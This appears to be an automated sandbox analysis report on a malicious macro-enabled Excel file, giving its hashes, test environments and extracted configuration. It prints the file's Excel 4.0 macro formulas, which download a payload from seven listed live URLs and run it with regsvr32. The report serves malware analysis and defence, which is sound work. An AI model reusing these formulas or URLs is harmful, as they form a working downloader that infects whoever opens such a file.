Behavioral task
behavioral1
Sample
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm
Resource
win10v2004-20241007-en
General
-
Target
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d
-
Size
35KB
-
MD5
1909a5fa37d26c68daf7d52c0a22d351
-
SHA1
228669309cbcbecd913acbe657858908d3fda9af
-
SHA256
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d
-
SHA512
7d0b66ff4f1eaff10b50ebd1a54e6dd0a1c04477d077d01c401fdf7e57cac70cda50a6a7f6574b794e3d0ecc908e17debded45590840db7e7d2b41372009c56b
-
SSDEEP
768:aYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:aYKtmg+UOZZ1ZYpoQ/pMAm
Malware Config
Extracted
https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
https://directorkay.com.ng/wp-admin/MYP3NA/
https://deatravel.al/wp-includes/H544R/
https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0)
=IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0))
=IF('EGVSBSR'!C28<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx")
=RETURN()
Signatures
Files
-
eb1b1f24745953db908595cd2b1854cd5c6e62356319b61e43bc7f0714f8ab0d.xlsm office2007